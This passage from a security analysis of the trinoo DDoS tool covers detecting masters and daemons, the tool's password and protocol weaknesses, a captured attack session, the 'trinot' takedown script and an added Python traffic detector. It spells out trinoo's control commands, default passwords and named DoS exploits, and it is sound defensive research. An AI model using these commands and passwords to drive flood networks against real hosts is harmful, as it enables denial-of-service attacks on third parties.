    master  1292 root    3u  inet   2534           UDP *:31335
    master  1292 root    4u  inet   2535           TCP *:27665 (LISTEN)
------------------------------------------------------------------------------

A system running a daemon would show the following:

------------------------------------------------------------------------------
    # netstat -a --inet
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State
    . . .
    udp        0      0 *:1024                  *:*
    udp        0      0 *:27444                 *:*
    . . .

    # lsof | egrep ":27444"
    ns        1316     root    3u  inet    2502       UDP *:27444

    # lsof -p 1316
    COMMAND  PID USER   FD   TYPE DEVICE    SIZE   NODE NAME
    ns      1316 root  cwd    DIR    3,1    1024 153694 /tmp/...
    ns      1316 root  rtd    DIR    3,1    1024      2 /
    ns      1316 root  txt    REG    3,1    6156 153711 /tmp/.../ns
    ns      1316 root  mem    REG    3,1  342206  28976 /lib/ld-2.1.1.so
    ns      1316 root  mem    REG    3,1   63878  29116 /lib/libcrypt-2.1.1.so
    ns      1316 root  mem    REG    3,1 4016683  29115 /lib/libc-2.1.1.so
    ns      1316 root    0u   CHR    4,1           2967 /dev/tty1
    ns      1316 root    1u   CHR    4,1           2967 /dev/tty1
    ns      1316 root    2u   CHR    4,1           2967 /dev/tty1
    ns      1316 root    3u  inet   2502            UDP *:27444
    ns      1316 root    4u  inet   2503            UDP *:1024
------------------------------------------------------------------------------

Defenses
--------

Of course, the best defense is to prevent intrusions and root level compromise of your systems in the first place, so there would be no systems on which to install trinoo master/daemons. In an ideal world, all systems would be patched, secured, monitored, intrusion detection systems and firewalls would be available to detect and reject packets, and I'd be a multi-millionaire living six months of the year in a beach mansion on Bali, and six months in the French Alps. In the real world, this is not an option (at least not in the foreseeable future.) Instead, your network may already have several trinoo daemons running and ready to DoS other systems at any minute. So how can they be detected or disabled?

Because the programs use high numbered UDP ports for both communication and attack, it will be very difficult (if not impossible) to block it without breaking programs that use UDP on high numbered ports.

The easiest method to detect the presence of trinoo masters or daemons (as the code exists presently) may be to monitor all UDP packets on shared Ethernet segments and look for the tell tale signs of communication between master(s) and daemon(s) as described elsewhere in this paper. (Switches would preclude seeing UDP packets that are not associated with the MAC address of the monitoring host's network interface.)
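The UDP monitoring described above can be automated. What follows is an added example written for this reprint; it is not code from the paper, from the trinoo sources, or from any of the tools the paper names. It decodes raw IPv4/UDP datagrams (the kind a sniffer hands you) and applies the protocol rules the paper documents: port 31335/udp carries "*HELLO*" and "PONG" from daemon to master, port 27444/udp carries three-letter commands from master to daemon, and the daemon only honours command lines containing the substring "l44". The three sample packets are the paper's own sniffit captures re-entered as hex (constructed input); the fourth is a deliberately truncated buffer to show that malformed captures are skipped rather than aborting the scan. Function names and the verdict strings are this example's own. IP and UDP checksums are deliberately not verified, since the hand-copied dumps in the paper do not recompute.

```python
"""Decode raw IPv4/UDP datagrams and flag trinoo master/daemon traffic.

Added example, not part of the original paper.  Ports, the "*HELLO*"
and "PONG" strings, the three-letter command set and the "l44" rule are
taken from the paper; everything else is this example's own.
"""
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Port numbers from the "Communication ports" section.
MASTER_TO_DAEMON_UDP = 27444
DAEMON_TO_MASTER_UDP = 31335
# Daemon commands from the "Daemon commands" section.
DAEMON_COMMANDS = {b"aaa", b"bbb", b"shi", b"png", b"d1e", b"rsz", b"xyz"}


@dataclass
class UdpDatagram:
    src: str
    dst: str
    sport: int
    dport: int
    payload: bytes


def parse_ipv4_udp(raw: bytes) -> UdpDatagram:
    """Decode IPv4 + UDP headers.  Length fields are checked against the
    buffer so a truncated or malformed capture raises ValueError instead
    of yielding garbage.  Checksums are not verified (see lead-in)."""
    if len(raw) < 20:
        raise ValueError("short IPv4 header")
    ver_ihl, _tos, total_len, _ident, _frag, _ttl, proto, _csum, src, dst = (
        struct.unpack("!BBHHHBBH4s4s", raw[:20]))
    if ver_ihl >> 4 != 4:
        raise ValueError("not IPv4")
    ihl = (ver_ihl & 0x0F) * 4
    if proto != 17:
        raise ValueError("not UDP")
    if ihl < 20 or total_len > len(raw) or ihl + 8 > total_len:
        raise ValueError("truncated packet")
    sport, dport, ulen, _ucsum = struct.unpack("!HHHH", raw[ihl:ihl + 8])
    if ulen < 8 or ihl + ulen > total_len:
        raise ValueError("bad UDP length")
    payload = raw[ihl + 8:ihl + ulen]
    return UdpDatagram(".".join(map(str, src)), ".".join(map(str, dst)),
                       sport, dport, payload)


def classify(dg: UdpDatagram) -> Optional[str]:
    """Apply the paper's protocol rules; None means 'not trinoo-looking'."""
    p = dg.payload
    if dg.dport == DAEMON_TO_MASTER_UDP:
        if p == b"*HELLO*":
            return "daemon registration (*HELLO*) to master"
        if p == b"PONG":
            return "daemon PONG reply to master"
        return "unrecognised payload on daemon->master port 31335/udp"
    if dg.dport == MASTER_TO_DAEMON_UDP:
        # Daemons only act on lines containing "l44" (default password
        # "l44adsl"); the first space-separated field is the command.
        fields = p.split(b" ")
        if len(fields) >= 2 and fields[0] in DAEMON_COMMANDS and b"l44" in p:
            return "master command '%s' to daemon" % fields[0].decode("ascii")
        return "unrecognised payload on master->daemon port 27444/udp"
    return None


def scan(packets: List[bytes]) -> List[Tuple[str, str, int, int, str]]:
    """Return (src, dst, sport, dport, verdict) for each matching datagram;
    malformed buffers are skipped so one bad capture does not stop the scan."""
    hits = []
    for raw in packets:
        try:
            dg = parse_ipv4_udp(raw)
        except ValueError:
            continue
        verdict = classify(dg)
        if verdict is not None:
            hits.append((dg.src, dg.dst, dg.sport, dg.dport, verdict))
    return hits


# Constructed input: the paper's three sniffit captures re-entered as hex,
# plus one truncated buffer that parse_ipv4_udp must reject.
_HEX_DUMPS = (
    "4500 0023 b15d 4000 f811 b927 c0a8 0001 0a00 0001"   # 192.168.0.1 -> 10.0.0.1
    "806c 7a67 000f 06d4 2a48 454c 4c4f 2a",              # udp 32876 -> 31335 "*HELLO*"
    "4500 0027 1aae 0000 4011 47d4 0a00 0001 c0a8 0001"   # 10.0.0.1 -> 192.168.0.1
    "0400 6b34 0013 2fb7 706e 6720 6c34 3461 6473 6c",    # udp 1024 -> 27444 "png l44adsl"
    "4500 0020 1381 4000 f811 5707 c0a8 0001 0a00 0001"   # 192.168.0.1 -> 10.0.0.1
    "806f 7a67 000c 4e24 504f 4e47",                      # udp 32879 -> 31335 "PONG"
)
SAMPLE_PACKETS = [bytes.fromhex(h) for h in _HEX_DUMPS] + [b"\x45\x00\x00\x10"]

if __name__ == "__main__":
    for src, dst, sport, dport, verdict in scan(SAMPLE_PACKETS):
        print("%s:%d -> %s:%d  %s" % (src, sport, dst, dport, verdict))
```

Feeding real traffic to this means stripping the link-layer header first (14 bytes for Ethernet) and passing the remainder to scan(); matching on destination port rather than source port is deliberate, because the daemon's source port is ephemeral (32876, 32879 in the captures) while the master's ports are fixed in the binaries.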
Unfortunately, this would only occur during an attack, which would likely become known by network throughput degradation and/or reports of denial of service attacks from victim sites.

If a system is suspected of hosting a trinoo daemon that is actively attacking, the output of the Solaris "truss" program on the running daemon will show output like the following:

------------------------------------------------------------------------------
    . . .
    getmsg(3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C)   = 0
    getmsg(3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C)   (sleeping...)
    getmsg(3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C)   = 0
    time()                                          = 938385467
    open("/dev/udp", O_RDWR)                        = 5
    ioctl(5, I_PUSH, "sockmod")                     = 0
    ioctl(5, I_STR, 0xEFFFF748)                     = 0
    ioctl(5, I_SETCLTIME, 0xEFFFF7FC)               = 0
    ioctl(5, I_SWROPT, 0x00000002)                  = 0
    sigprocmask(SIG_SETMASK, 0xEFFFF7EC, 0xEFFFF7DC) = 0
    ioctl(5, I_STR, 0xEFFFF660)                     = 0
    sigprocmask(SIG_SETMASK, 0xEFFFF7DC, 0xEFFFF7B8) = 0
    sigprocmask(SIG_BLOCK, 0xEFFFF548, 0xEFFFF5C0)  = 0
    ioctl(5, I_STR, 0xEFFFF548)                     = 0
    sigprocmask(SIG_SETMASK, 0xEFFFF5C0, 0x00000000) = 0
    putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
    time()                                          = 938385467
    putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
    time()                                          = 938385467
    putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
    time()                                          = 938385467
    putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
    time()                                          = 938385467
    putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
    time()                                          = 938385467
    putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
    time()                                          = 938385467
    putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
    time()                                          = 938385467
    putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
    time()                                          = 938385467
    putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
    time()                                          = 938385467
    putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
    time()                                          = 938385467
    . . .
------------------------------------------------------------------------------

The traffic on the network during an attack against a single target (as seen by "tcpdump") would look like:

------------------------------------------------------------------------------
    # tcpdump ip host 192.168.0.1
    . . .
    15:40:08.491782 10.0.0.1.1024 > 192.168.0.1.27444: udp 25
    15:40:08.574453 192.168.0.1.32885 > 216.160.XX.YY.16838: udp 4 (DF)
    15:40:08.576427 192.168.0.1.32885 > 216.160.XX.YY.5758: udp 4 (DF)
    15:40:08.579752 192.168.0.1.32885 > 216.160.XX.YY.10113: udp 4 (DF)
    15:40:08.583056 192.168.0.1.32885 > 216.160.XX.YY.17515: udp 4 (DF)
    15:40:08.600948 192.168.0.1.32885 > 216.160.XX.YY.31051: udp 4 (DF)
    15:40:08.604943 192.168.0.1.32885 > 216.160.XX.YY.5627: udp 4 (DF)
    15:40:08.610886 192.168.0.1.32885 > 216.160.XX.YY.23010: udp 4 (DF)
    15:40:08.614202 192.168.0.1.32885 > 216.160.XX.YY.7419: udp 4 (DF)
    15:40:08.615507 192.168.0.1.32885 > 216.160.XX.YY.16212: udp 4 (DF)
    15:40:08.616854 192.168.0.1.32885 > 216.160.XX.YY.4086: udp 4 (DF)
    15:40:08.618827 192.168.0.1.32885 > 216.160.XX.YY.2749: udp 4 (DF)
    15:40:08.623480 192.168.0.1.32885 > 216.160.XX.YY.12767: udp 4 (DF)
    15:40:08.625458 192.168.0.1.32885 > 216.160.XX.YY.9084: udp 4 (DF)
    15:40:08.628764 192.168.0.1.32885 > 216.160.XX.YY.12060: udp 4 (DF)
    15:40:08.632090 192.168.0.1.32885 > 216.160.XX.YY.32225: udp 4 (DF)
    . . .
------------------------------------------------------------------------------

Weaknesses
----------

The first weakness is that the crypt() encrypted passwords, and some prompts and return strings, are visible in both the master and daemon binary images. This can allow you to identify whether you have found a master or a daemon, determine whether the passwords are the defaults shown in this paper or not, and potentially allow you to exploit the password weaknesses to take control of some/all of the trinoo network yourself.

If the source code has been modified (which it no doubt will by smarter attackers), you would need to crack the passwords, or use a hexadecimal/ASCII editor (e.g., "xxd", part of the VIM editor suite) and change them in the binary image, in order to, for example, run the master to retrieve the list of daemons.
If the source has not been modified, you can determine this by observing the strings embedded in the program binary:

------------------------------------------------------------------------------
    # strings - ns
    . . .
    socket
    bind
    recvfrom
    %s %s %s
    aIf3YWfOhw.V.     <=== crypt() encrypted password "l44adsl"
    PONG
    *HELLO*
    . . .

    # strings - master
    . . .
    ---v
    v1.07d2+f3+c
    trinoo %s
    l44adsl           <=== clear text version of daemon password
    sock
    0nm1VNMXqRMyM     <=== crypt() encrypted password "gOrave"
    10:09:24
    Sep 26 1999
    trinoo %s [%s:%s]
    bind
    read
    *HELLO*
    ZsoTN.cq4X31      <=== CRYPTKEY
    bored
    NEW Bcast - %s
    PONG
    PONG %d Received from %s
    Warning: Connection from %s
    beUBZbLtK7kkY     <=== crypt() encrypted password "betaalmostdone"
    trinoo %s..[rpm8d/cb4Sx/]
    . . .
    DoS: usage: dos
    DoS: Packeting %s.
    aaa %s %s
    mdie
    ErDVt6azHrePE     <=== crypt() encrypted password for "mdie" command
    mdie: Disabling Bcasts.
    d1e %s
    mdie: password?
    . . .
------------------------------------------------------------------------------

Next, and more vulnerable, is the daemon password, which travels the network in clear text form. Assuming you know the UDP port on which the master communicates to the client, you can capture the password using "sniffit", "ngrep", "tcpdump", or any network monitoring program capable of showing UDP packet data payloads (see Appendix A for a sample session logged with "ngrep"). For example, here is the "png" command being sent to the trinoo daemon as seen by "sniffit":

    UDP Packet ID (from_IP.port-to_IP.port):
      10.0.0.1.1024-192.168.0.1.27444
       45 E  00 .  00 .  27 '  1A .  AE .  00 .  00 .  40 @  11 .  47 G  D4 .
       0A .  00 .  00 .  01 .  C0 .  A8 .  00 .  01 .  04 .  00 .  6B k  34 4
       00 .  13 .  2F /  B7 .  70 p  6E n  67 g  20    6C l  34 4  34 4  61 a
       64 d  73 s  6C l

As was mentioned earlier, the "mdie" command in the trinoo master is password protected in the master itself. There are a couple of ways to attack this.
If you can determine the crypt() encrypted string using the Unix "strings" command, you could (potentially) use a password cracking utility, such as "crack", and break it (see Appendix C). This may take a LONG time if the password was well chosen, but it is feasible (and the "killme" password for the "mdie" command was cracked in less than 30 seconds on a Pentium II).

You could try to sniff the password on the wire between the attacker and the master, but presumably this command would not be used by the attackers often, if at all, since they want the daemons to be active when needed for an attack.

You may have more luck sniffing the daemon password, since it is required for most commands. This can be done on either the daemon's or master's network (these are usually entirely different networks.) It should be easier to accomplish on the daemon's network since there are far more daemons than masters. Since many of the masters have been found on primary name servers, presumably there would be more traffic on high-numbered UDP ports on networks containing masters than on networks containing daemons (outside of the duration of denial of service attacks, that is.) Furthermore you will likely find several daemons at a given site, possibly as a result of detecting the original system compromise.

Once you have located a daemon, you have also found the list of IP addresses of masters (use "strings" to see them.) You should immediately contact these sites and convince them to closely inspect the system for signs of intrusion, with likely "root kit" installations to make this task more difficult, and attempt to coordinate a response.

Having found a master, the list of daemons (which will likely include hosts at many other sites) can be obtained by simply identifying the file which contains the list, if unencrypted. If, however, the file is encrypted, you would either have to decrypt the Blowfish encrypted file using the same key compiled into the program, or by taking control of the master and using the "bcast" command.

If you have identified an active command session to a master, which is a standard "telnet" style TCP session, you could hijack the session using "hunt" and start executing commands. Not knowing the "mdie" command password, you could not disable all the daemons directly, but you COULD use the "bcast" command and get a list of all of them (you would probably want to do this using the "script" command to generate a transcript of the session, as this could be a very large list).

Once you know the addresses of all the daemons, and the daemon password (visible in "strings" output), you could then send the proper command string in UDP packets to any suspected trinoo daemon(s). Creation and transmission of UDP packets can be accomplished with tools like LibNet, Spak, the Perl Net::RawIP library, etc. (A Perl script using Net::RawIP named "trinot" has been developed to accomplish this task. See Appendix B).

As the typical installation of the daemon includes a crontab entry that runs it every minute, you would have to constantly spray your entire network to keep the daemons from re-starting. (This may be due to programming bugs that cause the daemons to crash occasionally, or may be to defeat system administrators who simply notice and kill the process, but do not think to check for a crontab entry that re-starts the daemon.)

The daemons can also be found on your network by sniffing the data portion of UDP packets for the strings "*HELLO*" and "PONG", or any of the command strings themselves for that matter (until the source is modified to change these strings, of course.)
The "ngrep" program works nicely for this:

------------------------------------------------------------------------------
    # ngrep -i -x "*hello*|pong" udp
    interface: eth0 (192.168.0.200/255.255.255.0)
    filter: ip and ( udp )
    match: *hello*|pong
    . . .
    #
    U 192.168.0.1:32887 -> 10.0.0.1:31335
      2a 48 45 4c 4c 4f 2a                                  *HELLO*
    ###
    U 192.168.0.1:32888 -> 10.0.0.1:31335
      50 4f 4e 47                                           PONG

    U 192.168.0.3:32815 -> 10.0.0.1:31335
      50 4f 4e 47                                           PONG

    U 192.168.0.5:32798 -> 10.0.0.1:31335
      50 4f 4e 47                                           PONG
    . . .
------------------------------------------------------------------------------

While not weaknesses in trinoo itself, there are also weaknesses in the way the trinoo networks are set up.

As mentioned earlier, some systems showed crontab entries used to start the daemons once per minute. This leaves an obvious fingerprint on crontab files.

The scripts observed to automate the installation of trinoo networks use the Berkeley "rcp" command (use of rcp has also been observed in a file upload capability built into newer versions of the "Tribe Flood Network" daemon program). Monitoring "rcp" connections (514/tcp) from multiple systems on your network, in quick succession, to a single IP address outside your network would be a good trigger. (Note that the use of "rcp" in a script requires an anonymous trust relationship, usually in the form of "+ +" in a user's ~/.rhosts file, which also will allow you to immediately archive the contents of this account while contacting the owners to preserve evidence.)

(Further analysis of trinoo by George Weaver of Pennsylvania State University and David Brumley of Stanford University is included in Appendix E - Further methods of detecting trinoo. George deserves special credit for attempting to hand-decompile a recovered SPARC binary image! ;)

The next logical evolutionary steps
-----------------------------------

One of the easiest attacks to implement is the denial of service attack.
Many bugs exist in TCP/IP stacks, for example, that allow fragmented packets, large packets, IP options, half-open TCP connections, or floods of packets (highest bandwidth wins) etc., to cause the system performance to be degraded, or actually crash the system. As each bug is found, an exploit program demonstrating the bug is generally produced. Each of these exploit programs is generally unique, exploiting a specific bug that may only affect a single TCP/IP implementation (although with Microsoft having such a large market share of personal computers, and many home users being almost totally unaware of such bugs, let alone where to get and how to apply patches to fix these bugs, the chances are high that a multi-exploit attack will succeed in crashing the target system.)

These denial of service exploits are available from numerous sites on the Internet, such as:

    http://www.technotronic.com/denial.html
    http://www.rootshell.com/

The next step was to combine multiple denial of service exploits into one tool, using Unix shell scripts. One such tool, named "rape", (according to the code it was written in 1998 by "mars", with modifications by "TheVirus" and further code improvements by "ttol") integrates the following exploits into a single shell script:

    echo "Editted for use with www.ttol.base.org"
    echo "rapeing $IP. using weapons:"
    echo "latierra "
    echo -n "teardrop v2 "
    echo -n "newtear "
    echo -n "boink "
    echo -n "bonk "
    echo -n "frag "
    echo -n "fucked "
    echo -n "troll icmp "
    echo -n "troll udp "
    echo -n "nestea2 "
    echo -n "fusion2 "
    echo -n "peace keeper "
    echo -n "arnudp "
    echo -n "nos "
    echo -n "nuclear "
    echo -n "ssping "
    echo -n "pingodeth "
    echo -n "smurf "
    echo -n "smurf4 "
    echo -n "land "
    echo -n "jolt "
    echo -n "pepsi "

A tool like this has the advantage of allowing an attacker to give a single IP address and have multiple attacks be launched (increasing the probability of successful attack), but meant having to have pre-compiled versions of each individual exploit packaged up in a Unix "tar" format archive, etc., for convenient transfer to a (usually stolen) account from which to launch the attack.

To still allow multiple denial of service exploits to be used, but with a single pre-compiled program that is easier to store, transfer, and use quickly, programs like "targa.c" by Mixter were developed. Targa combines all of the following exploits in a single C source program:

    /* targa.c - copyright by Mixter
       version 1.0 - released 6/24/98 - interface to 8
       multi-platform remote denial of service exploits
    */
    . . .
    /* bonk by route|daemon9 & klepto
     * jolt by Jeff W. Roberson (modified by Mixter for overdrop effect)
     * land by m3lt
     * nestea by humble & ttol
     * newtear by route|daemon9
     * syndrop by PineKoan
     * teardrop by route|daemon9
     * winnuke by _eci */

Even combined denial of service tools like "targa" still only allow one attacker to hit one IP address at a time. To increase the effectiveness of the attack, groups of attackers, using IRC channels or telephone "voice bridges" for communication, could coordinate attacks, each person hitting a different system. This same coordination is being seen in probing for vulnerabilities, and in system compromise and control using multiple back doors and "root kits."
Even this has its limits, so in less than two years, it appears the next logical step has been taken to combine the power of a number of compromised systems into a distributed "denial of service cluster."

The "trinoo" tool is an example of this, as is another similar tool available in the computer underground called the "Tribe Flood Network" (or "TFN") by Mixter. While trinoo only implements UDP flood attacks, TFN supports ICMP flood, UDP flood, SYN flood, and Smurf style attacks, and is controlled via commands sent as ICMP_ECHOREPLY (ICMP Type 0) packets. It also employs Blowfish encryption, similar to trinoo. (TFN is analyzed in a separate paper).

It is all but guaranteed that these tools will continue to follow this trend and evolve into truly robust, covert, and distributed denial of service attack tools that employ strong encryption of embedded strings, passwords to control execution (possibly with trip wires that self-destruct, or wipe the entire system disc, if run in the wrong way, or by the wrong person), using encrypted communication channels, and communicating using packets posing as protocols like ICMP that are difficult to detect or block by firewalls.

--
David Dittrich
http://staff.washington.edu/dittrich/

Appendix A: Example of network session captured with "ngrep"
------------------------------------------------------------

The following is an example of what an attack session would look like when viewed with "ngrep".

------------------------------------------------------------------------------
# ngrep -x ".*" tcp port 27665 or udp port 31335 or udp port 27444
interface: eth0 (192.168.0.200/255.255.255.0)
filter: ip and ( tcp port 27665 or udp port 31335 or udp port 27444 )
match: .*
#
U 192.168.0.1:32892 -> 10.0.0.1:31335
  2a 48 45 4c 4c 4f 2a                                  *HELLO*
#
T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
  ff f4 ff fd 06                                        .....
######
T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
  62 65 74 61 61 6c 6d 6f 73 74 64 6f 6e 65 0d 0a       betaalmostdone..
#
T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
  74 72 69 6e 6f 6f 20 76 31 2e 30 37 64 32 2b 66       trinoo v1.07d2+f
  33 2b 63 2e 2e 5b 72 70 6d 38 64 2f 63 62 34 53       3+c..[rpm8d/cb4S
  78 2f 5d 0a 0a 0a                                     x/]...
##
T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
  74 72 69 6e 6f 6f 3e 20                               trinoo>
###
T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
  62 63 61 73 74 0d 0a                                  bcast..
#
T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
  4c 69 73 74 69 6e 67 20 42 63 61 73 74 73 2e 0a       Listing Bcasts..
  0a                                                    .
###
T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
  31 39 32 2e 31 36 38 2e 30 2e 31 2e 20 20 20 0a       192.168.0.1.   .
  0a 45 6e 64 2e 20 31 20 42 63 61 73 74 73 20 74       .End. 1 Bcasts t
  6f 74 61 6c 2e 0a 74 72 69 6e 6f 6f 3e 20             otal..trinoo>
##
T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
  6d 74 69 6d 65 72 20 31 30 30 30 0d 0a                mtimer 1000..
##
T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
  6d 74 69 6d 65 72 3a 20 53 65 74 74 69 6e 67 20       mtimer: Setting
  74 69 6d 65 72 20 6f 6e 20 62 63 61 73 74 20 74       timer on bcast t
  6f 20 31 30 30 30 2e 0a                               o 1000..
#
U 10.0.0.1:1025 -> 192.168.0.1:27444
  62 62 62 20 6c 34 34 61 64 73 6c 20 31 30 30 30       bbb l44adsl 1000
##
T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
  6d 74 69 6d 65 72 3a 20 53 65 74 74 69 6e 67 20       mtimer: Setting
  74 69 6d 65 72 20 6f 6e 20 62 63 61 73 74 20 74       timer on bcast t
  6f 20 31 30 30 30 2e 0a                               o 1000..
###
T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
  74 72 69 6e 6f 6f 3e 20                               trinoo>
###
T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
  6d 73 69 7a 65 20 33 32 30 30 30 0d 0a                msize 32000..
#
U 10.0.0.1:1025 -> 192.168.0.1:27444
  72 73 7a 20 33 32 30 30 30                            rsz 32000
#
T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
  74 72 69 6e 6f 6f 3e 20                               trinoo>
###
T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
  64 6f 73 20 32 31 36 2e 31 36 30 2e 58 58 2e 59       dos 216.160.XX.Y
  59 0d 0a                                              Y..
#
T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
  44 6f 53 3a 20 50 61 63 6b 65 74 69 6e 67 20 32       DoS: Packeting 2
  31 36 2e 31 36 30 2e 58 58 2e 59 59 2e 0a             16.160.XX.YY..
#
U 10.0.0.1:1025 -> 192.168.0.1:27444
  61 61 61 20 6c 34 34 61 64 73 6c 20 32 31 36 2e       aaa l44adsl 216.
  31 36 30 2e 58 58 2e 59 59                            160.XX.YY
#
T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
  74 72 69 6e 6f 6f 3e 20                               trinoo>
##
T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
  71 75 69 74 0d 0a                                     quit..
#
T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
  62 79 65 20 62 79 65 2e 0a                            bye bye..
###
T 192.168.100.1:1075 -> 10.0.0.1:27665 [AP]
  62 65 74 61 61 6c 6d 6f 73 74 64 6f 6e 65 0d 0a       betaalmostdone..
##
T 10.0.0.1:27665 -> 192.168.100.1:1075 [AP]
  74 72 69 6e 6f 6f 20 76 31 2e 30 37 64 32 2b 66       trinoo v1.07d2+f
  33 2b 63 2e 2e 5b 72 70 6d 38 64 2f 63 62 34 53       3+c..[rpm8d/cb4S
  78 2f 5d 0a 0a 0a                                     x/]...
###
T 10.0.0.1:27665 -> 192.168.100.1:1075 [AP]
  74 72 69 6e 6f 6f 3e 20                               trinoo>
###
T 192.168.100.1:1075 -> 10.0.0.1:27665 [AP]
  6d 70 69 6e 67 0d 0a                                  mping..
##
T 10.0.0.1:27665 -> 192.168.100.1:1075 [AP]
  6d 70 69 6e 67 3a 20 53 65 6e 64 69 6e 67 20 61       mping: Sending a
  20 50 49 4e 47 20 74 6f 20 65 76 65 72 79 20 42       PING to every B
  63 61 73 74 73 2e 0a                                  casts..
#
U 10.0.0.1:1025 -> 192.168.0.1:27444
  70 6e 67 20 6c 34 34 61 64 73 6c                      png l44adsl
##
U 192.168.0.1:32894 -> 10.0.0.1:31335
  50 4f 4e 47                                           PONG
##
T 10.0.0.1:27665 -> 192.168.100.1:1075 [AP]
  74 72 69 6e 6f 6f 3e 20 50 4f 4e 47 20 31 20 52       trinoo> PONG 1 R
  65 63 65 69 76 65 64 20 66 72 6f 6d 20 31 39 32       eceived from 192
  2e 31 36 38 2e 30 2e 31 0a                            .168.0.1.
##
T 192.168.100.1:1075 -> 10.0.0.1:27665 [AP]
  71 75 69 74 0d 0a                                     quit..
#
T 10.0.0.1:27665 -> 192.168.100.1:1075 [AP]
  62 79 65 20 62 79 65 2e 0a                            bye bye..
------------------------------------------------------------------------------

Appendix B - trinot script
--------------------------

------------------------------- cut here -----------------------------------
#!/usr/bin/perl -w
#
# trinot v. 1.1
# By Dave Dittrich
#
# Send commands to trinoo daemon(s), causing them to PONG, *HELLO*
# to all their masters, exit, etc.
Using this program (and knowledge # of the proper daemon password), you can affect trinoo daemons # externally and monitor packets to verify if the daemons are up, # expose their masters, or shut them down. # # Needs Net::RawIP (http://quake.skif.net/RawIP) # Requires libpcap (ftp://ftp.ee.lbl.gov/libpcap.tar.Z) # # Example: ./trinot host1 [host2 [...]] # ./trinot -S host # ./trinot -p password -P host # # (This code was hacked from the "macof" program, written by # Ian Vitek ) require 'getopts.pl'; use Net::RawIP; $a = new Net::RawIP({udp => {}}); chop($hostname = `hostname`); Getopts('PSDp:f:s:d:l:i:vh'); die "usage: $0 [options] host1 [host2 [...]]\ \t-P\t\t\tSend \"png\" command\ \t-S\t\t\tSend \"shi\" command\ \t-D\t\t\tSend \"d1e\" command (default)\ \t-p password\t\t(default:\"l44adsl\") \t-f from_host\t\t(default:$hostname)\ \t-s src_port\t\t(default:random)\ \t-d dest_port\t\t(default:27444)\ \t-l ipfile\t\tSend to IP addresses in ipfile\ \t-i interface \t\tSet sending interface (default:eth0)\ \t-v\t\t\tVerbose\ \t-h This help\n" unless ( !$opt_h ); # set default values $opt_i = ($opt_i) ? $opt_i : "eth0"; $s_port = ($opt_s) ? $opt_s : int rand 65535; $d_port = ($opt_d) ? $opt_d : 27444; $pass = ($opt_p) ? $opt_p : "l44adsl"; # choose network card if($opt_e) { $a->ethnew($opt_i, dest => $opt_e); } else { $a->ethnew($opt_i); } $cmd = ($opt_P) ? "png $pass" : ($opt_S) ? "shi $pass" : ($opt_D) ? "d1e $pass" : "d1e $pass"; $s_host = ($opt_f) ? $opt_f : $hostname; if ($opt_l) { open(I,"<$opt_l") || die "could not open file: '$opt_l'"; while () { chop; push(@ARGV,$_); } close(I); } foreach $d_host (@ARGV) { $a->set({ip => {saddr => $s_host, daddr => $d_host}, udp => {source => $s_port, dest => $d_port, data => $cmd} }); print "sending '$cmd' to $d_host\n" if $opt_v; $a->send; } exit(0); ------------------------------- cut here ----------------------------------- Appendix C - References ----------------------- TCP/IP Illustrated, Vol. I, II, and III. W. 
Richard Stevens and Gary R. Wright., Addison-Wesley. lsof: ftp://vic.cc.purdue.edu/pub/tools/unix/lsof/ tcpdump: ftp://ftp.ee.lbl.gov/tcpdump.tar.Z hunt: http://www.cri.cz/kra/index.html sniffit: http://sniffit.rug.ac.be/sniffit/sniffit.html ngrep: http://www.packetfactory.net/ngrep/ loki client/server: Phrack Magazine, Volume Seven, Issue Forty-Nine, File 06 of 16, [ Project Loki ] http://www.phrack.com/search.phtml?view&article=p49-6 Phrack Magazine Volume 7, Issue 51 September 01, 1997, article 06 of 17 [ L O K I 2 (the implementation) ] http://www.phrack.com/search.phtml?view&article=p51-6 LibNet: http://www.packetfactory.net/libnet/ Net::RawIP: http://quake.skif.net/RawIP crack: http://www.crypto.dircon.co.uk/ Password cracking utilities: http://packetstorm.securify.com/Crackers/ targa.c: http://packetstorm.securify.com/exploits/DoS/targa.c Appendix D - Abbreviated report of actual trinoo attack. ------------------------------------------------------ The following is an abbreviated version the initial report sent out by Susan Levy Haskell of the University of Minnesota. This report, which only concerns a small time span in the three day attack, showed 227 unique attacking systems, 114 of which were at Internet 2 sites. (The actual list of attacking systems, all of which are also root compromised victims in their own right, have been removed. A complete report of all unique attacking IP addresses over the three day period is not available.) Just to show what a large trinoo network could do, consider that a file (named "owned.log") containing 888 IP addresses was found same location as the trinoo source code analyzed here (which is assumed to be the same code as that used for the attack). Another file in that directory (named "216") contains addresses of 10549 systems on 216.0.0.0/8 netblocks, and is 